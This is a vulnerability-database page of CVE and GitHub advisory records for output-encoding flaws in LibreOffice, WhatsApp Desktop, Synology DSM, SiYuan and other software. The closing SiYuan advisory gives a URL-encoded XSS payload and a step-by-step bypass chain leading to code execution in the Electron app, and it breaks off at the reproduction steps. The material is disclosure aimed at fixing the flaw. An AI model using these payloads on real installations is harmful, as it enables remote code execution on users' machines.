            "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9852"
          },
          {
            "name": "20190815 [SECURITY] [DSA 4501-1] libreoffice security update",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Aug/28"
          },
          {
            "name": "DSA-4501",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2019/dsa-4501"
          },
          {
            "name": "FEDORA-2019-2fe22a3a2c",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/"
          },
          {
            "name": "USN-4102-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4102-1/"
          },
          {
            "name": "openSUSE-SU-2019:2057",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html"
          },
          {
            "name": "20190910 [SECURITY] [DSA 4519-1] libreoffice security update",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Sep/17"
          },
          {
            "name": "openSUSE-SU-2019:2183",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html"
          },
          {
            "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "LibreOffice",
          "vendor": "Document Foundation",
          "versions": [
            {
              "lessThan": "6.2.6",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue"
        }
      ],
      "datePublic": "2019-08-15T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreOffice has a feature where documents can specify that pre-installed macros can be executed on various script events such as mouse-over, document-open etc. Access is intended to be restricted to scripts under the share/Scripts/python, user/Scripts/python sub-directories of the LibreOffice install. Protection was added, to address CVE-2018-16858, to avoid a directory traversal attack where scripts in arbitrary locations on the file system could be executed. However this new protection could be bypassed by a URL encoding attack. In the fixed versions, the parsed url describing the script location is correctly encoded before further processing. This issue affects: Document Foundation LibreOffice versions prior to 6.2.6."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "CWE-116 Improper Encoding or Escaping of Output",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-06T13:06:10.000Z",
        "orgId": "4fe7d05b-1353-44cc-8b7a-1e416936dff2",
        "shortName": "Document Fdn."
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9852"
        },
        {
          "name": "20190815 [SECURITY] [DSA 4501-1] libreoffice security update",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Aug/28"
        },
        {
          "name": "DSA-4501",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2019/dsa-4501"
        },
        {
          "name": "FEDORA-2019-2fe22a3a2c",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/"
        },
        {
          "name": "USN-4102-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4102-1/"
        },
        {
          "name": "openSUSE-SU-2019:2057",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html"
        },
        {
          "name": "20190910 [SECURITY] [DSA 4519-1] libreoffice security update",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Sep/17"
        },
        {
          "name": "openSUSE-SU-2019:2183",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html"
        },
        {
          "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Insufficient URL encoding flaw in allowed script location check",
      "x_generator": {
        "engine": "Vulnogram 0.0.7"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@documentfoundation.org",
          "DATE_PUBLIC": "2019-08-15T00:00:00.000Z",
          "ID": "CVE-2019-9852",
          "STATE": "PUBLIC",
          "TITLE": "Insufficient URL encoding flaw in allowed script location check"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "LibreOffice",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "6.2.6"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Document Foundation"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "LibreOffice has a feature where documents can specify that pre-installed macros can be executed on various script events such as mouse-over, document-open etc. Access is intended to be restricted to scripts under the share/Scripts/python, user/Scripts/python sub-directories of the LibreOffice install. Protection was added, to address CVE-2018-16858, to avoid a directory traversal attack where scripts in arbitrary locations on the file system could be executed. However this new protection could be bypassed by a URL encoding attack. In the fixed versions, the parsed url describing the script location is correctly encoded before further processing. This issue affects: Document Foundation LibreOffice versions prior to 6.2.6."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.7"
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-116 Improper Encoding or Escaping of Output"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9852",
              "refsource": "MISC",
              "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9852"
            },
            {
              "name": "20190815 [SECURITY] [DSA 4501-1] libreoffice security update",
              "refsource": "BUGTRAQ",
              "url": "https://seclists.org/bugtraq/2019/Aug/28"
            },
            {
              "name": "DSA-4501",
              "refsource": "DEBIAN",
              "url": "https://www.debian.org/security/2019/dsa-4501"
            },
            {
              "name": "FEDORA-2019-2fe22a3a2c",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PMEGUWMWORC3DOVEHVXLFT3A5RSCMLBH/"
            },
            {
              "name": "USN-4102-1",
              "refsource": "UBUNTU",
              "url": "https://usn.ubuntu.com/4102-1/"
            },
            {
              "name": "openSUSE-SU-2019:2057",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00006.html"
            },
            {
              "name": "20190910 [SECURITY] [DSA 4519-1] libreoffice security update",
              "refsource": "BUGTRAQ",
              "url": "https://seclists.org/bugtraq/2019/Sep/17"
            },
            {
              "name": "openSUSE-SU-2019:2183",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00067.html"
            },
            {
              "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "4fe7d05b-1353-44cc-8b7a-1e416936dff2",
    "assignerShortName": "Document Fdn.",
    "cveId": "CVE-2019-9852",
    "datePublished": "2019-08-15T21:40:18.556Z",
    "dateReserved": "2019-03-17T00:00:00.000Z",
    "dateUpdated": "2024-09-17T03:42:47.414Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-3571 (GCVE-0-2019-3571)

Vulnerability from cvelistv5 – Published: 2019-07-16 20:16 – Updated: 2024-08-04 19:12
VLAI
Summary
An input validation issue affected WhatsApp Desktop versions prior to 0.3.3793 which allows malicious clients to send files to users that would be displayed with a wrong extension.
Severity
No CVSS data available.
CWE
  • CWE-116 - Improper Encoding or Escaping of Output (CWE-116), Improper Handling of Unicode Encoding (CWE-176)
Assigner
References
Impacted products
Vendor Product Version
Facebook WhatsApp Desktop Affected: 0.3.3793
Affected: unspecified , < 0.3.3793 (custom)
Create a notification for this product.
Date Public
2019-07-16 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T19:12:09.515Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.facebook.com/security/advisories/cve-2019-3571"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "WhatsApp Desktop",
          "vendor": "Facebook",
          "versions": [
            {
              "status": "affected",
              "version": "0.3.3793"
            },
            {
              "lessThan": "0.3.3793",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "dateAssigned": "2019-07-16T00:00:00.000Z",
      "datePublic": "2019-07-16T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "An input validation issue affected WhatsApp Desktop versions prior to 0.3.3793 which allows malicious clients to send files to users that would be displayed with a wrong extension."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "Improper Encoding or Escaping of Output (CWE-116), Improper Handling of Unicode Encoding (CWE-176)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-07-16T20:16:35.000Z",
        "orgId": "4fc57720-52fe-4431-a0fb-3d2c8747b827",
        "shortName": "facebook"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.facebook.com/security/advisories/cve-2019-3571"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve-assign@fb.com",
          "DATE_ASSIGNED": "2019-07-16",
          "ID": "CVE-2019-3571",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "WhatsApp Desktop",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "!=\u003e",
                            "version_value": "0.3.3793"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_value": "0.3.3793"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Facebook"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An input validation issue affected WhatsApp Desktop versions prior to 0.3.3793 which allows malicious clients to send files to users that would be displayed with a wrong extension."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Improper Encoding or Escaping of Output (CWE-116), Improper Handling of Unicode Encoding (CWE-176)"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.facebook.com/security/advisories/cve-2019-3571",
              "refsource": "CONFIRM",
              "url": "https://www.facebook.com/security/advisories/cve-2019-3571"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "4fc57720-52fe-4431-a0fb-3d2c8747b827",
    "assignerShortName": "facebook",
    "cveId": "CVE-2019-3571",
    "datePublished": "2019-07-16T20:16:35.000Z",
    "dateReserved": "2019-01-02T00:00:00.000Z",
    "dateUpdated": "2024-08-04T19:12:09.515Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-8920 (GCVE-0-2018-8920)

Vulnerability from cvelistv5 – Published: 2018-12-24 15:00 – Updated: 2024-09-17 00:06
VLAI
Summary
Improper neutralization of escape vulnerability in Log Exporter in Synology DiskStation Manager (DSM) before 6.1.6-15266 allows remote attackers to inject arbitrary content to have an unspecified impact by exporting an archive in CSV format.
CWE
  • CWE-116 - Improper Encoding or Escaping of Output
Assigner
References
Impacted products
Vendor Product Version
Synology DiskStation Manager (DSM) Affected: unspecified , < 6.1.6-15266 (custom)
Create a notification for this product.
Date Public
2018-12-24 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T07:10:47.020Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.synology.com/security/advisory/Synology_SA_18_14"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "DiskStation Manager (DSM)",
          "vendor": "Synology",
          "versions": [
            {
              "lessThan": "6.1.6-15266",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2018-12-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Improper neutralization of escape vulnerability in Log Exporter in Synology DiskStation Manager (DSM) before 6.1.6-15266 allows remote attackers to inject arbitrary content to have an unspecified impact by exporting an archive in CSV format."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "CWE-116: Improper Encoding or Escaping of Output",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-05-12T12:50:49.000Z",
        "orgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
        "shortName": "synology"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.synology.com/security/advisory/Synology_SA_18_14"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@synology.com",
          "DATE_PUBLIC": "2018-12-24T00:00:00",
          "ID": "CVE-2018-8920",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "DiskStation Manager (DSM)",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003c",
                            "version_affected": "\u003c",
                            "version_value": "6.1.6-15266"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Synology"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Improper neutralization of escape vulnerability in Log Exporter in Synology DiskStation Manager (DSM) before 6.1.6-15266 allows remote attackers to inject arbitrary content to have an unspecified impact by exporting an archive in CSV format."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-116: Improper Encoding or Escaping of Output"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.synology.com/security/advisory/Synology_SA_18_14",
              "refsource": "CONFIRM",
              "url": "https://www.synology.com/security/advisory/Synology_SA_18_14"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "db201096-a0cc-46c7-9a55-61d9e221bf01",
    "assignerShortName": "synology",
    "cveId": "CVE-2018-8920",
    "datePublished": "2018-12-24T15:00:00.000Z",
    "dateReserved": "2018-03-22T00:00:00.000Z",
    "dateUpdated": "2024-09-17T00:06:52.970Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-23PW-5M4P-MJGM

Vulnerability from github – Published: 2024-01-16 18:31 – Updated: 2025-06-20 21:31
VLAI
Details

The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0233"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116",
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-01-16T16:15:14Z",
    "severity": "MODERATE"
  },
  "details": "The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin",
  "id": "GHSA-23pw-5m4p-mjgm",
  "modified": "2025-06-20T21:31:40Z",
  "published": "2024-01-16T18:31:10Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0233"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-24PV-X5F7-PV4R

Vulnerability from github – Published: 2023-05-23 12:30 – Updated: 2024-04-04 04:18
VLAI
Details

WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote (").

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-31669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-23T12:15:09Z",
    "severity": "MODERATE"
  },
  "details": "WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting \u0027@\u0027 before a quote (\").",
  "id": "GHSA-24pv-x5f7-pv4r",
  "modified": "2024-04-04T04:18:44Z",
  "published": "2023-05-23T12:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WebAssembly/wabt/issues/2165"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OSFFCKXUQ5PAC5UVXY7N6HEHVQ3AC2RG"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OSFFCKXUQ5PAC5UVXY7N6HEHVQ3AC2RG"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2532-QX65-H9M6

Vulnerability from github – Published: 2026-07-14 00:31 – Updated: 2026-07-14 00:31
VLAI
Details

luci-app-banip contains a log parsing vulnerability where the awk-based parser extracts the first IPv4 address from log lines regardless of field position, allowing attackers to inject arbitrary IPs via attacker-controlled fields like usernames. An unauthenticated remote attacker can inject an IP address into the login username field, causing banIP to block the wrong target while the real attacker remains unblocked.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-62184"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-13T22:16:49Z",
    "severity": "HIGH"
  },
  "details": "luci-app-banip contains a log parsing vulnerability where the awk-based parser extracts the first IPv4 address from log lines regardless of field position, allowing attackers to inject arbitrary IPs via attacker-controlled fields like usernames. An unauthenticated remote attacker can inject an IP address into the login username field, causing banIP to block the wrong target while the real attacker remains unblocked.",
  "id": "GHSA-2532-qx65-h9m6",
  "modified": "2026-07-14T00:31:03Z",
  "published": "2026-07-14T00:31:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openwrt/luci/security/advisories/GHSA-r6hx-4f83-vp8m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-62184"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openwrt/luci/commit/d9bbc372e29618a8807b693a1ccf6d0e42cd196c"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/luci-app-banip-log-monitor-ip-extraction-bypass"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-25G3-V2PJ-968V

Vulnerability from github – Published: 2024-06-29 06:31 – Updated: 2024-08-01 15:31
VLAI
Details

An issue in dc2niix before v.1.0.20240202 allows a local attacker to execute arbitrary code via the generated file name is not properly escaped and injected into a system call when certain types of compression are used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-27629"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-28T19:15:05Z",
    "severity": "HIGH"
  },
  "details": "An issue in dc2niix before v.1.0.20240202 allows a local attacker to execute arbitrary code via the generated file name is not properly escaped and injected into a system call when certain types of compression are used.",
  "id": "GHSA-25g3-v2pj-968v",
  "modified": "2024-08-01T15:31:51Z",
  "published": "2024-06-29T06:31:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27629"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rordenlab/dcm2niix/pull/789"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-25RP-H46X-2HJM

Vulnerability from github – Published: 2026-05-08 19:08 – Updated: 2026-06-08 20:11
VLAI
Summary
SiYuan: Electron Renderer RCE via decodeURIComponent-driven tooltip XSS in aria-label sink (incomplete fix for CVE-2026-34585)
Details

Summary

The tooltip mouseover handler in app/src/block/popover.ts reads aria-label via getAttribute and passes it through decodeURIComponent before assigning to messageElement.innerHTML in app/src/dialog/tooltip.ts:41. The encoder used at the producer side, escapeAriaLabel in app/src/util/escape.ts:19-25, only handles HTML special characters (", ', <, literal &lt;) — it leaves %XX URL-escapes untouched. So a doc title containing %3Cimg src=x onerror=...%3E round-trips through escapeAriaLabel and the HTML attribute layer unmodified. Then decodeURIComponent on the consumer side converts %3C to a literal < character (a real <, NOT a character reference). When that string is assigned to innerHTML, the HTML5 tokenizer enters TagOpenState on the literal <, parses the <img> element, and the onerror handler fires.

Because the renderer runs with nodeIntegration: true, contextIsolation: false, webSecurity: false (app/electron/main.js:407-411), require('child_process') is reachable from the injected handler, escalating to arbitrary code execution.

Doc titles, AV column names + descriptions, AV select options, file-tree tooltips all reach this sink because they're rendered into class="ariaLabel" elements with aria-label="${escapeAriaLabel(...)}". Doc title is the easiest plant — any user with create/rename access lands the payload, and the file survives .sy.zip round-trip without modification.

Why a "double HTML-decode" framing is wrong

A naïve reading of the chain might suggest that &amp;lt; (the encoder output) decodes once at attribute-parse time to &lt;, then a second time at innerHTML time to < — yielding a tag. That's incorrect and confirmed false by direct browser testing. Per the HTML5 spec, character references in DataState produce CHARACTER tokens (text), not TagOpenState transitions: the < resulting from a &lt; reference is text data, never a tag-open delimiter. So the HTML-entity-only payload renders as visible literal text, not as a tag.

The actual bypass relies on decodeURIComponent producing a literal < (not a character reference) before innerHTML parses it. Literal < characters in the input stream DO trigger TagOpenState. URL encoding is the right vehicle because the encoder ignores %XX while the consumer chain decodes it.

Details

Encoder. app/src/util/escape.ts:19-25:

export const escapeAriaLabel = (html: string) => {
    if (!html) { return html; }
    return html.replace(/"/g, "&quot;").replace(/'/g, "&apos;")
        .replace(/</g, "&amp;lt;").replace(/&lt;/g, "&amp;lt;");
};

The four replacements only cover HTML special chars. %XX URL escapes are not touched.

Source — search-result rendering. app/src/search/util.ts:1406:

<span class="b3-list-item__text ariaLabel" ... aria-label="${escapeAriaLabel(title)}">${escapeGreat(title)}</span>

Same pattern at :1448, protyle/render/av/blockAttr.ts:205, protyle/render/av/col.ts:134, protyle/render/av/select.ts:36, search/unRef.ts:113. The title is built from getNotebookName(item.box) + getDisplayName(item.hPath, false) (line 1398). The hPath returned by /api/search/fullTextSearchBlock carries the user-set doc title verbatim — %XX URL-escapes pass through, only HTML special chars are entity-encoded by the kernel.

Consumer. app/src/block/popover.ts:33,144:

let tip = aElement.getAttribute("aria-label") || "";       // literal stored attribute value
// ... branch logic that doesn't apply to plain search results ...
showTooltip(decodeURIComponent(tip), aElement, ...);       // ← decodes %XX into raw chars

decodeURIComponent is presumably present to handle URL-encoded asset paths in some hyperlink tooltips, but it's applied unconditionally to every aria-label-sourced tip — that's what enables this bypass.

Sink. app/src/dialog/tooltip.ts:41:

messageElement.innerHTML = message;     // ← HTML parser sees the now-decoded raw `<` and starts parsing tags

Decode-chain trace for in-memory title %3Cimg src=x onerror="alert('SiYuan')"%3E (URL-encoded < > ', literal "):

step result
in-memory title %3Cimg src=x onerror="alert('SiYuan')"%3E
escapeAriaLabel writes (only " and ' get encoded — neither appears here as raw chars when ' is %27) %3Cimg src=x onerror=&quot;alert(%27SiYuan%27)&quot;%3E
HTML attribute set: aria-label="..." ; browser one-decodes named entities when storing in-DOM value = %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E
getAttribute("aria-label") %3Cimg src=x onerror="alert(%27SiYuan%27)"%3E (verbatim)
decodeURIComponent(tip) <img src=x onerror="alert('SiYuan')"> (real < ' > chars)
messageElement.innerHTML = … HTML parser tokenizes raw <img>, creates element, fails to load src=x, fires onerror → JS runs

Renderer + reachability. Renderer posture and auto-admin gates same as the AV-name advisory (Advisory 1): nodeIntegration:true, contextIsolation:false, webSecurity:false at app/electron/main.js:407-411; empty-AccessAuthCode local auto-admin at kernel/model/session.go:261-287; chrome-extension:// Origin allowlist at session.go:277.

Suggested fix

  1. Primary — app/src/dialog/tooltip.ts:41: replace ts messageElement.innerHTML = message; with ts messageElement.textContent = message; For tooltips that legitimately need markup (memo rendering, hyperlink preview cards), introduce an explicit {html: true} flag on showTooltip(...) and route the message through DOMPurify.sanitize(message) before assigning to innerHTML.

  2. Drop decodeURIComponent at popover.ts:144 for the generic aria-label path. Apply it only on the few callers that intentionally pass URL-encoded asset paths (e.g. the local-asset hyperlink preview branch already inside the function), and apply it inside try/catch with a clear scope. Aria-label content is not URL-encoded by design; decoding it is a footgun that converts otherwise-safe attributes into pre-parsed HTML.

  3. Consolidate the four escape helpers in app/src/util/escape.ts (escapeHtml, escapeAttr, escapeAriaLabel, escapeGreat) into one Lute.EscapeHTMLStr-equivalent that escapes &, <, >, ", '. Context-specific encoders without compile-time enforcement keep producing bug-class variants.

  4. (Defense-in-depth) Switch the main BrowserWindow to contextIsolation: true with a preload bridge — caps every future renderer XSS at "DOM only," not RCE.


Reproduction (copy-paste-ready)

Tested on Windows with SiYuan v3.6.5 (kernel + Electron) and Microsoft Edge as the offline parser-validation engine. Linux/macOS users substitute py with python3 and use any modern Chromium-based browser (Edge/Chrome/Brave) for the standalone validation step.

Prereqs

  1. Install SiYuan v3.6.5 from https://github.com/siyuan-note/siyuan/releases and launch once. Do not set an AccessAuthCode (default).
